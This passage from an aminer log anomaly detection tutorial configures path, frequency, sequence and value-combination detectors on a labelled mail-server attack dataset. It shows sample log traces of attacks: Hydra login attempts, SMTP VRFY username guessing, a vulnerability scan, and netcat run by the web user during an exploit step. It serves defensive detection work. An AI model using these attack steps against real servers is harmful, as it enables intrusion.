      200 8527 \"http://mail.cup.com/mnemo/list.php\" \"Mozilla/5.0 
      (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\"' 
      is missing, but should follow event b'192.168.10.238 - - 
      [04/Mar/2020:19:26:04 +0000] \"POST /login.php HTTP/1.0\" 200 6360 
      \"-\" \"Mozilla/5.0 (Hydra)\"'",
    "PersistenceFileName": "accesslog_method_request"
  }
}
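The statistical reasoning behind this report can be reproduced with a few lines of Python. The following is a simplified sketch (not the aminer's actual implementation) that applies a binomial test to the Expected and Observed values from the anomaly above:

```python
from math import comb

def binom_tail(n, k, p):
    """Probability of observing at most k successes in n trials
    when each trial succeeds with probability p."""
    return sum(comb(n, i) * p**i * (1 - p)**(n - i) for i in range(k + 1))

p = 187 / 200      # rule probability taken from the "Expected" field above
alpha = 0.001      # significance level used in the detection phase

# "Observed": 0 successful correlations out of 14 attempts
print(binom_tail(14, 0, p) < alpha)  # → True, i.e., the violation is significant
```

Observing 0 successes in 14 trials under a success probability of 0.935 is far less likely than alpha = 0.001, so the rule violation is reported.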

In this try-it-out, the event correlation detector is set to analyze the correlations between values at particular paths. However, the same detector can be used to analyze the correlations of event type occurrences, i.e., paths that occur for each log event. Due to the fact that the Apache Access logs only contain one type of event, this functionality is not demonstrated. To switch from value to event correlation, just remove the paths parameter. The aminer will then consider all occurring log event types for learning rules and detecting rule violations.

Exim Mainlog file

The path detector was already mentioned before, but has not yet been used to detect attacks. The Exim Mainlog file is therefore used to demonstrate a practical application of this detector. Remember that the path detector is always active and monitors the observed log event types through the paths of the parser model. All log lines that are covered by the parser model but use paths that never occurred in the training phase are disclosed by the path detector. For the following example, the previously configured analysis components do not necessarily have to be removed, in particular when the Apache Access logs are commented out.
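The core idea of the path detector can be sketched in a few lines of Python (a simplified stand-in for illustration, not the actual aminer implementation):

```python
# Simplified sketch of new-path detection: the set of parser paths seen in
# training is persisted; any line that introduces an unseen path is reported.
known_paths = set()

def process(parsed_paths, learn_mode):
    """parsed_paths: the parser-model paths matched by one log line."""
    new_paths = [p for p in parsed_paths if p not in known_paths]
    if learn_mode:
        known_paths.update(new_paths)
        return []              # nothing reported while learning
    return new_paths           # in detection mode, unseen paths are anomalies

# training phase: a benign line (paths are illustrative)
process(["/parser/model/fm/login"], learn_mode=True)
# detection phase: a line using a path never seen in training
print(process(["/parser/model/fm/vrfy_failed"], learn_mode=False))
# → ['/parser/model/fm/vrfy_failed']
```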

Try it out: Split Exim Mainlog file into training and test files

Similar to the Apache Access log file, it is necessary to split the Exim Mainlog file into a training and test file using the commands:

cd /home/ubuntu/data/mail.cup.com/exim4
split -d -l 4735 mainlog mainlog_

The training file is called mainlog_00 and the test file, which contains 2608 lines, is called mainlog_01.

Try it out: Run aminer with path detector

While the aminer is capable of handling multiple input files at once, it may be difficult to experiment with a detector as long as anomalies from other log files are triggered. Therefore, it is recommended to remove or comment out the path to the Apache Access log and replace it with the path to the Exim Mainlog training file, i.e.,

LogResourceList:
  - 'file:///home/ubuntu/data/mail.cup.com/exim4/mainlog_00'

Due to the fact that the syntax of the lines in this log file is different to the Apache Access logs, it is necessary to append an appropriate parsing model to the configuration. In particular, add the EximParsingModel and append it to the root node as follows:

Parser:
  - id: 'apacheAccessModel'
    type: ApacheAccessParsingModel
    name: 'apacheAccess'
    args: 'apacheAccess'

  - id: 'eximModel'
    type: EximParsingModel
    name: 'exim'
    args: 'exim'

  - id: 'START'
    start: True
    type: FirstMatchModelElement
    name: 'parser'
    args:
      - apacheAccessModel
      - eximModel

Note that the previously defined apacheAccessModel is still part of the parser and should therefore not be commented out. In order to see the number of log lines parsed from the Exim Mainlog files, add the following parser path to the parser count analysis component.

- type: 'ParserCount'
  paths: 
    - '/parser/model/sp' # Exim

Start the aminer and wait until all lines are processed. Then, switch to the mainlog_01 file for testing and set the learning mode flag of the path detector to False by writing the following expression to the top of the configuration file.

LearnMode: False

Run the aminer on the test file to obtain all anomalies. One of them is displayed in the following.

"AffectedLogAtomPaths": [
  "/parser/model/fm/vrfy_failed",
  "/parser/model/fm/vrfy_failed/vrfy_failed_str",
  "/parser/model/fm/vrfy_failed/mail",
  "/parser/model/fm/vrfy_failed/h_str",
  "/parser/model/fm/vrfy_failed/h",
  "/parser/model/fm/vrfy_failed/sp1",
  "/parser/model/fm/vrfy_failed/ip",
  "/parser/model/fm/vrfy_failed/sp2"
],
"RawLogData": [
  "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) 
    [192.168.10.238]"
]

As visible, several new paths have been observed by the detector in the raw log line stated above. The reason is that this line is covered by the parser model but never occurred in the training file. It is a legitimate line, but in this context it is used to brute-force guess user names via the VRFY command (the VRFY command of the SMTP protocol is explained in detail in RFC 5321, accessible at https://tools.ietf.org/html/rfc5321). Accordingly, this anomaly is correctly triggered.

Suricata event logs

Suricata event logs contain information on network communication. The logs mainly consist of netflows, but also contain statistics and alerts detected by suricata during log generation. The logs are available in JSON format; however, since there is exactly one JSON object per line, it is possible to parse them just like any other log data. Note that multi-line JSON logs are more easily parsed using the JsonModelElement.
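The one-JSON-object-per-line property means each line can be decoded independently, as a quick stand-alone illustration in Python shows (the sample line is shortened and purely illustrative):

```python
import json

# Each line of eve.json is one complete JSON object, so the file can be
# processed line by line like any other log file.
sample = '{"timestamp":"2020-03-04T18:00:00.000000+0000","event_type":"alert","src_ip":"192.168.10.190"}'
event = json.loads(sample)
print(event["event_type"], event["src_ip"])  # → alert 192.168.10.190
```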

Alerts that occur in logs are not necessarily linked to attacks. In particular, misconfigurations or otherwise unusual user behavior may be reported as anomalies, but considered as perfectly normal by administrators. Accordingly, alerts can be processed by the aminer just as any other log line - through parsing and subsequent analysis of values. In the following, the number of alerts occurring within a certain time window is considered as an indicator for strange system behavior. As mentioned before, a certain "baseline" of occurring alerts can be considered normal if it occurs consistently over time. However, a sudden increase of alerts is clearly a sign that something changed in the system, and should thus be reported by the aminer.

Try it out: Split suricata event logs into training and test files

Use the following command to split the suricata event logs into two files. This generates the training file eve_00 and the test file eve_01 with 306764 lines.

cd /home/ubuntu/data/mail.cup.com/suricata
split -d -l 625925 eve.json eve_

Try it out: Run aminer on suricata event logs with the frequency detector

Make sure that the path to the input file points to the eve_00 file that was just created. To parse suricata event logs, a predefined parser is provided together with the aminer. To load the SuricataEventParsingModel, add the following code to the parser section of the config.yml.

Parser:
  - id: 'suricataEventModel'
    type: SuricataEventParsingModel
    name: 'suricataEvent'
    args: 'suricataEvent'

  - id: 'startModel'
    start: True
    type: SequenceModelElement
    name: 'parser'
    args: 
      - suricataEventModel

The following code adds the EventFrequencyDetector to the aminer pipeline. The detector is configured to monitor the frequencies of source IP addresses (the parameter paths points to the corresponding parser path), i.e., it adds up all occurrences of each IP address within a time window and checks whether the resulting sums are constant over time. The idea behind this is that different IP addresses may be responsible for different amounts of alerts, and monitoring each of them separately allows more precise detection and immediately shows the analyst which IP address is connected to an anomaly if one of the monitored sums is suspiciously high or low. Note that it would also be possible to use more than a single path here - in this case, the combined occurrences of the values would be monitored and counted. If no paths are provided, the aminer counts the number of occurring events, i.e., the number of logs corresponding to particular sets of parser paths.

Since user behavior is relatively unstable over the day (there is usually more activity during the day than during the night), the size of the time window is set to 86400 seconds (24 hours) so that any daily patterns are evened out. The confidence factor is set to the relatively low value of 0.01 so that only strong anomalies are reported and fluctuations caused by normal user behavior (i.e., false positives) are less likely to result in anomalies. More precisely, the observed frequency of a value needs to be 1 / 0.01 = 100 times smaller or larger than the expected frequency to trigger an anomaly. More information on the detection technique of the frequency detector can be found in the HowTo: FrequencyDetector.

Analysis:
  - type: 'EventFrequencyDetector'
    paths:
            - '/parser/model/event_type/alert/conn/ip/ipv4/src_ip'
    window_size: 86400
    confidence_factor: 0.01
    learn_mode: True
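The threshold implied by confidence_factor can be illustrated with a short sketch (a simplification of the detector's decision rule; the actual detector additionally computes a confidence score):

```python
def frequency_anomaly(expected, observed, confidence_factor=0.01):
    """Report only if the observed count deviates from the expected count
    by more than a factor of 1 / confidence_factor."""
    return (observed < expected * confidence_factor
            or observed > expected / confidence_factor)

# 5 alerts expected per 24h window; 6431 observed during the attack
print(frequency_anomaly(5, 6431))  # → True  (6431 > 5 / 0.01 = 500)
print(frequency_anomaly(5, 21))    # → False (within the tolerated range)
```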

The ParserCount should also be adapted as follows so that the number of parsed lines from the suricata event logs is correctly displayed.

  - type: 'ParserCount'
    paths: 
      - '/parser/model/event_type_str'

Then, run the aminer and wait until all lines have been processed, i.e., the number of currently processed lines reported by the ParserCount reaches 0. Stop the aminer so that all models are persisted and then check the occurrence sums learned by the frequency detector with the command cat /var/lib/aminer/EventFrequencyDetector/Default. The result is as follows:

[[["string:3232238270"], 21], [["string:3232238318"], 5]]

This means that in the last time window, two different IP addresses (stored in decimal notation) were observed causing alerts: IP 192.168.10.190 occurred with 21 alerts and IP 192.168.10.238 occurred with 5 alerts. Now, switch the input log file to eve_01 and set the learn_mode of the frequency detector to False before starting the aminer again. Ignore the anomalies reported by the unparsed detector and look out for anomalies from the frequency detector, which should look as follows.

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 3,
    "AnalysisComponentType": "EventFrequencyDetector",
    "AnalysisComponentName": "EventFrequencyDetector3",
    "Message": "Frequency anomaly detected",
    "PersistenceFileName": "Default",
    "AffectedLogAtomPaths": [
      "/parser/model/event_type/alert/conn/ip/ipv4/src_ip"
    ],
    "AffectedLogAtomValues": [
      "3232238318"
    ]
  },
  "FrequencyData": {
    "ExpectedLogAtomValuesFrequency": 5,
    "LogAtomValuesFrequency": 6431,
    "ConfidenceFactor": 0.01,
    "Confidence": 0.9992225159384233
  },
  "LogData": {
    "RawLogData": [
      "{\"timestamp\":\"2020-03-05T08:28:49.752121+0000\",\"flow_id\":6836384253615,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.190\",\"src_port\":49130,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2012887,\"rev\":3,\"signature\":\"ET POLICY Http Client Body contains pass= in cleartext\",\"category\":\"Potential Corporate Privacy Violation\",\"severity\":1},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/login.php\",\"http_user_agent\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\",\"http_content_type\":\"text\\/html\",\"http_refer\":\"http:\\/\\/mail.cup.com\\/login.php\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":302,\"redirect\":\"\\/services\\/portal\\/\",\"length\":20}}"
    ],
    "Timestamps": [
      1583396929.75
    ],
    "DetectionTimestamp": 1616658696.46,
    "LogLinesCount": 1
  }
}

The anomaly shows that IP address 192.168.10.238 (denoted in decimal notation as 3232238318 in the field AffectedLogAtomValues) occurred 6431 times in the monitored time window, largely exceeding the expected amount of 5 occurrences as well as the reporting limit of 5 * 100 = 500 occurrences. Since this deviation is relatively large, the computed confidence of the anomaly is also relatively high at around 0.999. The sharp increase of alerts is caused by the vulnerability scan, which generates a large number of suspicious lines within a short period of time. While alerts occur regularly, this burst of alerts is particularly suspicious and thus correctly detected as an anomaly. However, it is important to point out that this is just an exemplary use of the frequency detector - all values or value combinations that occur with regular frequencies are well suited to be monitored with this detector. In addition, it is also possible to monitor the occurrence frequencies of events rather than values by omitting the paths parameter. Working with events rather than values is demonstrated in the following section.
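Decimal IP values such as those in AffectedLogAtomValues or in the persistency file can be converted back to dotted notation with Python's standard library:

```python
from ipaddress import IPv4Address

# The aminer persists IPv4 addresses as 32-bit integers.
print(IPv4Address(3232238318))  # → 192.168.10.238
print(IPv4Address(3232238270))  # → 192.168.10.190
```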

Messages log file

The messages log file contains diverse events, including error messages, information on mails sent between users, login and logout events, etc. A closer look shows that some of the messages appear in particular constellations: a user logging in usually generates two consecutive events by the horde and imp services, error messages usually occur in specific batches, and so on. Even though some of these events are sometimes interleaved, it is possible to learn the sequences of event occurrences and use this information for anomaly detection. In this section, the sequence detector is used for this purpose.

Try it out: Split messages log file into training and test files

First, generate a training and test file using the following commands. The training file is named messages_00 and the test file is named messages_01, comprising 11299 lines.

cd /home/ubuntu/data/mail.cup.com
split -d -l 22968 messages messages_

Try it out: Run aminer on messages log file with the sequence detector

Messages are logged in the same syntax as syslog. Accordingly, the SyslogParsingModel that comes predefined with the aminer can be used for parsing. Add the model as follows and make sure that the path to the input file is correctly set to the location of messages_00.

Parser:
  - id: 'syslogModel'
    type: SyslogParsingModel
    name: 'syslog'
    args: 'syslog'

  - id: 'startModel'
    start: True
    type: SequenceModelElement
    name: 'parser'
    args: 
      - syslogModel

Then, add the sequence detector as follows. Note that the length of the sequences to be learned is set to 3, which means that the event types of 3 consecutive messages are analyzed. If these 3 types have not been observed in that order before, the learned model is adapted or an anomaly is reported. For more information on the sequence detector, check out the HowTo: SequenceDetector.

Analysis:
  - type: 'EventSequenceDetector'
    seq_len: 3
    learn_mode: True

As before, add the following path to the parser count component to see the number of processed lines from the messages log file.

- type: 'ParserCount'
  paths: 
    - '/parser/model/host'

Then, run the aminer and wait until all lines are processed. During training, the aminer should already report a number of anomalies from the sequence detector. The reason is that in the beginning no sequences are known, and every newly observed sequence triggers an anomaly when being added to the learned model. After some time, the number of reported anomalies should stabilize and fewer anomalies should be reported. Once the training phase is complete, switch to the messages_01 input file and set the learn_mode of the sequence detector to False. Run the aminer again and review the generated anomalies. Some false positives are generated, which can be explained by the fact that the generation of these messages is not fully deterministic and the training phase thus does not cover all possible sequences that can occur during normal behavior. However, most anomalies are generated around 19:15-19:30 and correspond to certain steps of the attack. For example, consider the following anomaly.

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 3,
    "AnalysisComponentType": "EventSequenceDetector",
    "AnalysisComponentName": "EventSequenceDetector3",
    "Message": "New sequence detected",
    "PersistenceFileName": "Default",
    "AffectedLogAtomPaths": [
      [
        "/parser",
        "/parser/model",
        "/parser/model/time",
        "/parser/model/sp1",
        "/parser/model/host",
        "/parser/model/service/horde",
        "/parser/model/service/horde/horde_str",
        "/parser/model/service/horde/horde/imp",
        "/parser/model/service/horde/to_str",
        "/parser/model/service/horde/pid",
        "/parser/model/service/horde/line_str",
        "/parser/model/service/horde/line",
        "/parser/model/service/horde/of_str",
        "/parser/model/service/horde/path",
        "/parser/model/service/horde/brack_str",
        "/parser/model/service/horde/horde/imp/succ_str",
        "/parser/model/service/horde/horde/imp/imp/auth_failed",
        "/parser/model/service/horde/horde/imp/imp/auth_failed/auth_failed_str"
      ],
      [
        "/parser",
        "/parser/model",
        "/parser/model/time",
        "/parser/model/sp1",
        "/parser/model/host",
        "/parser/model/service/horde",
        "/parser/model/service/horde/horde_str",
        "/parser/model/service/horde/horde/imp",
        "/parser/model/service/horde/to_str",
        "/parser/model/service/horde/pid",
        "/parser/model/service/horde/line_str",
        "/parser/model/service/horde/line",
        "/parser/model/service/horde/of_str",
        "/parser/model/service/horde/path",
        "/parser/model/service/horde/brack_str",
        "/parser/model/service/horde/horde/imp/succ_str",
        "/parser/model/service/horde/horde/imp/imp/login_failed",
        "/parser/model/service/horde/horde/imp/imp/login_failed/succ_str",
        "/parser/model/service/horde/horde/imp/imp/login_failed/user",
        "/parser/model/service/horde/horde/imp/imp/login_failed/brack_str1",
        "/parser/model/service/horde/horde/imp/imp/login_failed/ip",
        "/parser/model/service/horde/horde/imp/imp/login_failed/to_str",
        "/parser/model/service/horde/horde/imp/imp/login_failed/imap_addr",
        "/parser/model/service/horde/horde/imp/imp/login_failed/brack_str2"
      ],
      [
        "/parser",
        "/parser/model",
        "/parser/model/time",
        "/parser/model/sp1",
        "/parser/model/host",
        "/parser/model/service/horde",
        "/parser/model/service/horde/horde_str",
        "/parser/model/service/horde/horde/imp",
        "/parser/model/service/horde/to_str",
        "/parser/model/service/horde/pid",
        "/parser/model/service/horde/line_str",
        "/parser/model/service/horde/line",
        "/parser/model/service/horde/of_str",
        "/parser/model/service/horde/path",
        "/parser/model/service/horde/brack_str",
        "/parser/model/service/horde/horde/imp/succ_str",
        "/parser/model/service/horde/horde/imp/imp/auth_failed",
        "/parser/model/service/horde/horde/imp/imp/auth_failed/auth_failed_str"
      ]
    ]
  },
  "LogData": {
    "RawLogData": [
      "Mar  4 19:27:08 mail HORDE: [imp] [login] Authentication failed. [pid 6742 on line 730 of \"/var/www/mail.cup.com/imp/lib/Imap.php\"]"
    ],
    "Timestamps": [
      1583350028
    ],
    "DetectionTimestamp": 1616596765.5,
    "LogLinesCount": 1
  }
}

The AffectedLogAtomPaths show that the involved event types all correspond to authentication failures and failed login events. Since login failures are rather uncommon, this sequence of back-to-back failed login attempts never occurred in the training phase. However, the brute-force login attack step caused several login failures within a short period of time and thus generated this new sequence, which was correctly detected by the sequence detector.

Note that in addition to analyzing event type sequences, it is also possible to analyze sequences of values or value combinations. Just as for the frequency detector, this depends on the presence of the paths parameter in the sequence detector configuration. This is demonstrated more thoroughly in the HowTo: SequenceDetector.
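The sequence learning described in this section can be sketched as follows (an illustrative simplification, not the aminer's implementation; returning True for each newly learned sequence mirrors the anomalies reported during training):

```python
from collections import deque

class SequenceSketch:
    """Learn event-type sequences of fixed length; report unseen ones."""
    def __init__(self, seq_len=3):
        self.window = deque(maxlen=seq_len)
        self.known = set()

    def process(self, event_type, learn_mode):
        self.window.append(event_type)
        if len(self.window) < self.window.maxlen:
            return False                 # window not yet filled
        seq = tuple(self.window)
        if seq in self.known:
            return False
        if learn_mode:
            self.known.add(seq)
            return True                  # reported once, then learned
        return True                      # new sequence -> anomaly

# training phase with illustrative event types
det = SequenceSketch(seq_len=3)
for ev in ["login", "portal", "logout", "login", "portal"]:
    det.process(ev, learn_mode=True)
# detection phase: an event type that creates a never-observed 3-sequence
print(det.process("login_failed", learn_mode=False))  # → True
```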

Audit logs

The Audit logs, produced by the Audit daemon auditd, contain a high number of categorical values structured as key-value pairs. A closer investigation of the log lines shows that the occurrences of most of these values are highly dependent on each other, i.e., there are groups of values that frequently occur together. Log events with such a structure and behavior are usually promising candidates for value combination detection. When determining the parser paths to be monitored, it is important to (i) only select paths whose values have some kind of dependency or relationship to each other, (ii) avoid random or continuously changing values, e.g., process IDs (pid in Audit logs), because they do not provide any benefit for detection and yield many false positives, and (iii) avoid paths with extremely large numbers of possible values, e.g., function parameters (a1, a2, a3, etc. in Audit logs), because they result in extremely large persistency sizes. In the following, the combination of syscall type (syscall), user ID (uid), and command information (comm and exe) is selected, because as a group these paths reveal which entity executed a particular action and how it was handled by the system.

Try it out: Split Audit logs into training and test files

Note that due to their large size, the Audit logs are zip-archived in the AIT-LDSv1.1 and first have to be extracted manually. After extraction, generate a training and test file by using the following commands:

cd /home/ubuntu/data/mail.cup.com/audit
split -d -l 81934700 audit.log audit_

This generates the training file audit_00 and the test file audit_01 with 41694466 lines. Note that Audit log files are extremely large and thus all operations on that data, including running the aminer, take considerably more time than for the other data sets.

Try it out: Run aminer on Audit logs with combo detector

Open the configuration and set the correct input file path pointing to the audit_00 file. Similar to the exim mainlog, it is necessary to append an appropriate parsing model to the configuration so that audit logs can be parsed. In particular, add the AuditdParsingModel with the following code:

Parser:
  - id: 'apacheAccessModel'
    type: ApacheAccessParsingModel
    name: 'apacheAccess'
    args: 'apacheAccess'

  - id: 'eximModel'
    type: EximParsingModel
    name: 'exim'
    args: 'exim'

  - id: 'auditModel'
    type: AuditdParsingModel
    name: 'audit'
    args: 'audit'
    
  - id: 'START'
    start: True
    type: FirstMatchModelElement
    name: 'parser'
    args:
      - apacheAccessModel
      - eximModel
      - auditModel

Then add the combination detector to the list of analysis components as follows:

Analysis:
  - type: 'NewMatchPathValueComboDetector'
    paths:
      - '/parser/model/type/syscall/syscall'
      - '/parser/model/type/syscall/uid'
      - '/parser/model/type/syscall/comm'
      - '/parser/model/type/syscall/exe'
    learn_mode: True
    persistence_id: 'audit_syscall_uid_comm_exe'
    output_logline: False
    allow_missing_values: False

Note that the learn_mode parameter is set to True. It is not necessary to comment out or delete the other existing detectors, unless input files in addition to the Audit logs are used and the output should not be affected by them. The parser count analysis component should also be extended to show the number of parsed lines from the Audit files. To do this, add the following path.

- type: 'ParserCount'
  paths: 
    - '/parser/model/type_str' # Audit

Start the aminer and wait until the training logs have been parsed. Then, open the persistency of the combo detector to review the learned combinations.

sudo vim /var/lib/aminer/NewMatchPathValueComboDetector/audit_syscall_uid_comm_exe

A short selection of all learned value combinations is shown in the following:

[1, "bytes:0", "bytes:\"apache2\"", "bytes:\"/bin/dash\""],
[2, "bytes:0", "bytes:\"auth\"", "bytes:\"/usr/lib/dovecot/auth\""], 
[42, "bytes:0", "bytes:\"(md.daily)\"", "bytes:\"/lib/systemd/systemd\""], 
[42, "bytes:0", "bytes:\"cron\"", "bytes:\"/usr/sbin/cron\""],
[59, "bytes:0", "bytes:\"sh\"", "bytes:\"/bin/dash\""]

For the detection, change the input file path to the test file audit_01, set the learn_mode parameter of the NewMatchPathValueComboDetector for audit data to False, and restart the aminer. Many anomalies should be detected, including the following:

"AffectedLogAtomValues": [
  "59",
  "33",
  "\"netcat\"",
  "\"/bin/nc.traditional\""
],
"RawLogData": [
  "type=SYSCALL msg=audit(1583350370.206:45582192): 
    arch=c000003e syscall=59 success=yes exit=0 a0=557558e14468 
    a1=557558158c30 a2=557558e14408 a3=7f53bebf4750 items=2 
    ppid=8773 pid=8774 auid=4294967295 uid=33 gid=33 euid=33 
    suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) 
    ses=4294967295 comm=\"netcat\" exe=\"/bin/nc.traditional\" 
    key=(null)"
]

As visible in the AffectedLogAtomValues, this anomaly shows an execution of the netcat tool by user 33, which is part of the Horde exploit attack step. Since these values did not occur in the training data, the anomaly was raised by the combination detector. Closer investigation shows that the netcat command was never executed by any user in the training file, so this line could also be detected by a simple value detector monitoring a single parser path. However, there are also cases where only the combination of values can correctly differentiate normal from anomalous behavior. For example, consider the following anomaly raised by the combo detector:

"AffectedLogAtomValues": [
  "1",
  "0",
  "\"sh\"",
  "\"/bin/dash\""
],
"RawLogData": [
  "type=SYSCALL msg=audit(1583350659.428:45636740): 
    arch=c000003e syscall=1 success=yes exit=17 a0=1 
    a1=5562cb5b3410 a2=11 a3=73 items=0 ppid=8963 pid=8964 
    auid=4294967295 uid=0 gid=113 euid=0 suid=0 fsuid=0 egid=113 
    sgid=113 fsgid=113 tty=(none) ses=4294967295 comm=\"sh\" 
    exe=\"/bin/dash\" key=(null)"
]

Note that each of the AffectedLogAtomValues has already been observed individually in the training log file, as visible in the sample selection of persisted value combinations above. Nevertheless, the anomaly was raised because these values never occurred together in one line, which correctly discloses an anomaly that is part of the Exim exploit attack step.
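This behavior can be sketched in a few lines (an illustrative simplification of the combination detector; the training combinations are taken from the persisted sample shown earlier):

```python
# Simplified value-combination detection: the tuple of values at the
# monitored paths is learned as a whole, so a line can be anomalous even
# though every individual value was already seen in training.
known_combos = set()

def check(syscall, uid, comm, exe, learn_mode=False):
    combo = (syscall, uid, comm, exe)
    if combo in known_combos:
        return False
    if learn_mode:
        known_combos.add(combo)
        return False
    return True  # unseen combination -> anomaly

# training phase (combinations from the persisted sample shown earlier)
check(1, 0, "apache2", "/bin/dash", learn_mode=True)
check(59, 0, "sh", "/bin/dash", learn_mode=True)

# detection phase: all four values were seen individually, but never together
print(check(1, 0, "sh", "/bin/dash"))  # → True
```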

This concludes the aminer try-it-out. The final configuration that was incrementally built in this try-it-out is provided in the following.

LearnMode: True
AminerUser: 'aminer'
AminerGroup: 'aminer'

LogResourceList:
        #- 'file:///home/ubuntu/data/mail.cup.com-train/daemon.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/auth.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/suricata/eve.json'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/suricata/fast.log'
        - 'file:///home/ubuntu/data/mail.cup.com-test/apache2/mail.cup.com-access.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/apache2/mail.cup.com-error.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-test/exim4/mainlog'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/syslog'
        #- 'file:///home/ubuntu/data/mail.cup.com-test/audit/audit.log'

# Read and store information to be used between multiple invocations
# of aminer in this directory. The directory must only be accessible
# to the 'AminerUser' but not group/world readable. On violation,
# aminer will refuse to start. When undefined, '/var/lib/aminer'
# is used.
# Core.PersistenceDir: '/tmp/lib/aminer'

# Define a target e-mail address to send alerts to. When undefined,
# no e-mail notification hooks are added.
# MailAlerting.TargetAddress: 'root@localhost'

# Sender address of e-mail alerts. When undefined, "sendmail"
# implementation on host will decide, which sender address should
# be used.
# MailAlerting.FromAddress: 'root@localhost'

# Define, which text should be prepended to the standard aminer
# subject. Defaults to "aminer Alerts:"
# MailAlerting.SubjectPrefix: 'aminer Alerts:'

# Define a grace time after startup before aminer will react to
# an event and send the first alert e-mail. Defaults to 0 (any
# event can immediately trigger alerting).
# MailAlerting.AlertGraceTime: 0

# Define how many seconds to wait after a first event triggered
# the alerting procedure before really sending out the e-mail.
# In that timespan, events are collected and will be sent all
# using a single e-mail. Defaults to 10 seconds.
# MailAlerting.EventCollectTime: 10

# Define the minimum time between two alert e-mails in seconds
# to avoid spamming. All events during this timespan are collected
# and sent out with the next report. Defaults to 600 seconds.
# MailAlerting.MinAlertGap: 600

# Define the maximum time between two alert e-mails in seconds.
# When undefined this defaults to "MailAlerting.MinAlertGap".
# Otherwise this will activate an exponential backoff to reduce
# messages during permanent error states by increasing the alert
# gap by 50% when more alert-worthy events were recorded while
# the previous gap time was not yet elapsed.
# MailAlerting.MaxAlertGap: 600

# Define how many events should be included in one alert mail
# at most. This defaults to 1000
# MailAlerting.MaxEventsPerMessage: 1000

# Configure the logline prefix
# LogPrefix: ''

Parser:
        - id: 'auditModel'
          type: AuditdParsingModel
          name: 'audit'
          args: 'audit'

        - id: 'suricataEventModel'
          type: SuricataEventParsingModel
          name: 'suricataEvent'
          args: 'suricataEvent'

        - id: 'syslogModel'
          type: SyslogParsingModel
          name: 'syslog'
          args: 'syslog'

        - id: 'apacheAccessModel'
          type: ApacheAccessParsingModel
          name: 'apacheAccess'
          args: 'apacheAccess'

        - id: 'apacheErrorModel'
          type: ApacheErrorParsingModel
          name: 'apacheError'
          args: 'apacheError'

        - id: 'eximModel'
          type: EximParsingModel
          name: 'exim'
          args: 'exim'

        - id: 'suricataFastModel'
          type: SuricataFastParsingModel
          name: 'suricataFast'
          args: 'suricataFast'

        - id: 'START'
          start: True
          type: FirstMatchModelElement
          name: 'parser'
          args:
            - auditModel
            - suricataEventModel
            - syslogModel
            - apacheAccessModel
            - apacheErrorModel
            - eximModel
            - suricataFastModel

Input:
        multi_source: True
        timestamp_paths: 
          - '/parser/model/time'
          - '/parser/model/type/execve/time'
          - '/parser/model/type/proctitle/time'
          - '/parser/model/type/syscall/time'
          - '/parser/model/type/path/time'
          - '/parser/model/type/login/time'
          - '/parser/model/type/sockaddr/time'
          - '/parser/model/type/unknown/time'
          - '/parser/model/type/cred_refr/time'
          - '/parser/model/type/user_start/time'
          - '/parser/model/type/user_acct/time'
          - '/parser/model/type/user_auth/time'
          - '/parser/model/type/cred_disp/time'
          - '/parser/model/type/service_start/time'
          - '/parser/model/type/service_stop/time'
          - '/parser/model/type/user_end/time'
          - '/parser/model/type/cred_acq/time'
          - '/parser/model/type/user_bprm_fcaps/time'


Analysis:
         - type: 'ParserCount'
           paths:
            - '/parser/model/type_str' # Audit
            - '/parser/model/status_code' # Apache Access
            - '/parser/model/php' # Apache Error
            - '/parser/model/sp' # Exim
            - '/parser/model/event_type_str' # Suricata Event
            - '/parser/model/classification' # Suricata Fast
            - '/parser/model/host' # Syslog
           report_interval: 10

         - type: 'NewMatchPathValueDetector'
           paths: ['/parser/model/status_code']
           persistence_id: 'accesslog_status'
           output_logline: False
           learn_mode: True

         - type: 'NewMatchPathValueComboDetector'
           paths: ['/parser/model/fm/request/method', '/parser/model/combined/combined/user_agent']
           persistence_id: 'accesslog_request_agent'
           output_logline: False
           allow_missing_values: False
           learn_mode: True

         # Additional analysis components, disabled by default; uncomment to enable them.
         #- type: 'EventCorrelationDetector'
         #  paths: ['/parser/model/fm/request/method', '/parser/model/fm/request/request']
         #  max_observations: 200
         #  hypothesis_max_delta_time: 10.0
         #  hypotheses_eval_delta_time: 28800.0
         #  delta_time_to_discard_hypothesis: 28800.0
         #  p0: 0.95
         #  alpha: 0.05
         #  check_rules_flag: False
         #  persistence_id: 'accesslog_method_request'
         #  learn_mode: True

         #- type: 'NewMatchPathValueComboDetector'
         #  paths: ['/parser/model/type/syscall/syscall', '/parser/model/type/syscall/uid', '/parser/model/type/syscall/comm', '/parser/model/type/syscall/exe']
         #  learn_mode: False
         #  persistence_id: 'audit_syscall_uid_comm_exe'
         #  output_logline: False
         #  allow_missing_values: False

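         # This tutorial also discusses detecting new log event types. A minimal,
         # untested sketch of such a component is shown below (commented out); it
         # assumes the NewMatchPathDetector component shipped with the aminer,
         # which reports parser paths that have not been seen before.
         #- type: 'NewMatchPathDetector'
         #  persistence_id: 'new_path'
         #  learn_mode: True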
EventHandlers:
        - id: 'stpe'
          json: True # optional, defaults to False
          type: 'StreamPrinterEventHandler'
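        # Further handlers can be registered alongside the stream printer to
        # forward anomalies elsewhere. The entry below is a hedged, commented-out
        # sketch: it assumes the SyslogWriterEventHandler distributed with the
        # aminer package and has not been tested in this setup.
        #- id: 'syslogWriter'
        #  type: 'SyslogWriterEventHandler'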